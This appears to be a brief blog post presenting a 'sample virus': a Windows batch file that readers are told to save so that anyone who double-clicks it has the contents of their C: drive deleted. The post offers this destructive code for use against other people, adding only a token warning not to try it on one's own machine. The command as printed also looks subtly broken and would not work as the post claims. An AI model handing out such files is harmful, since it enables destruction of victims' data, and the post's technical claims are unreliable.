Malicious code to delete the content of the c folder (Sample Virus)

To delete the content of C folder on your computer simply type the following code in a note pad and save as .bat format. If some one double click the file it will automatically delete all the contents on the C:\ folder.

The code is:

@Echo off
Del C:\ *.* |y


I recomend you to never try the code on your computer.

0 comments: